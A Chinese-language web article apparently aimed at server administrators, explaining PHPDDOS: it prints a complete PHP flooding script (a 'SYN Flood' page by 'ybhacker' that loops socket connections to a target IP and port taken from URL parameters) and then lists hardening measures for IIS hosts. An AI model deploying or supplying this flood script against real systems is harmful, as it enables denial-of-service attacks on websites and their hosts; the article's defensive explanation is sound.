还有:
- <?php
- ini_set("display_errors", "Off");
- $packets = 0;
- $ip = $_GET['ip'];
- $port = $_GET['port'];
- set_time_limit(0);
- ignore_user_abort(FALSE);
- $exec_time = $_GET['time'];
- $timetime = time();
- print "状态 : 正常运行中.....<br>";
- $max_time = $time+$exec_time;
- while(1){
- $packets++;
- if(time() > $max_time){
- break;
- }
-
- $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);
- }
- echo "================================================<br>";
- echo " <font color=blue>www.phpddos.com<br>";
- echo " SYN Flood 模块<br>";
- echo " 作者:ybhacker<br>";
- echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
- echo "================================================<br><br>";
- echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
- echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
- echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
- echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
- ?>
这明显是程序采用fsockopen 发送TCP UDP包, 不断的发送TCP UDP 包,这就是DDOS攻击。
但是局限于IIS程序池环境下,威力不是很明显,最多是让IIS假死,不会产生几百G流量让整个机房都受影响!当然,若是机器很多,达到几千个机器同时发送这样PHPDDOS,被攻击IP 网站肯定也是无法访问的。黑客的目的就是如此!
到网上找到不少文章资料,但是一一尝试都不完美,禁PHP函数组建,会引起程序的不兼容,封堵所有UDP端口,会引起系统软件无法向外通信。好模板推荐的办法:
1. 限制IIS上所有站点的带宽。
2. 网站单站点控制好脚本权限,是给ASP的就给ASP,绝对不要给NET等权限。 不同脚本开不同权限,若全开了,权限无法完美控制。
3. 不用网上通用的cms系统,因为源码开放的,可能黑客早已经通读代码发觉出漏洞。往往官方封堵也不及时!真的要用也得删除不需要的组建,比如ECSHOP程序,一定要限制好缓存目录的权限,dedecms要限制图片后台缓存文件夹的权限,删除文件管理组件等。
4. 遇到PHPDDOS,停止所有IIS站点,一个一个排查。从最近修改过的文件开始通读。
5. 临时解决办法,使用星外的IPS工具包封堵。大家网上搜索下。 但是不建议。
6. 养成良好的维护习惯,经常维护更新机器资源。控制带宽使用。
(责任编辑:好模板) |